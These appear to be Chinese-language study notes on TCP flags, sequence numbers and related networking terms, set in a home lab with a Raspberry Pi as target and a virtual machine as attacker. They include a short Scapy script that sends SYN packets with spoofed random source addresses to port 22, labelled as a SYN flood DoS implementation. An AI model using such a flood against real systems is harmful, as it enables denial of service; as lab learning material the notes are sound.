TCP协议
-
然后再加个TCP SYN泛洪DOS攻击实现
-
树莓派:被攻击的
-
192.168.0.104
-
-
本地虚拟机:攻击发起方
-
192.168.0.102
-
-
TCP:数据包在传递时
- 1:为数据包标志序号
- 目标接受到这些序号的数据,会按照顺序拼接起来
- 2:校验序号,
- 1,2,3
- 1:为数据包标志序号
-
TCP FLAGS:TCP数据包标志位
- U:URG,紧急比特
- A:ACK,确认比特
- P:PSH,推送比特
- S:SYN,同步比特
- 这个是一个连接请求的数据包
- 代表着我要主动连接对方
- F:FIN,终止比特
- 当我要和对方断开连接
- R:RST,复位比特
- 代表重新建立连接
-
IP:连接层 ,IP
-
PORT:传输层,TCP
-
CDN:资源的中间站点
- CDN,服务器也好 花钱买流量
- CDN 分布器
-
scapy模块:
- 构建TCP数据包
-
ARP欺诈
- 双向ARP
-
netstat -n | grep ‘SYN’ | wc -l:
- 统计有多少SYN的连接
实例
from random import randint
from scapy.all import *
for var in range(10):
random_ip = '%s.%s.%s.%s' % (randint(1,255),randint(1,255),randint(1,255),randint(1,255))
random_port = 23333
data = IP(dst='192.168.0.104',src=random_ip) / TCP(dport=22,sport=random_port,flags='S') #SYN TCP数据包
send(data) #发送
三次握手、四次回收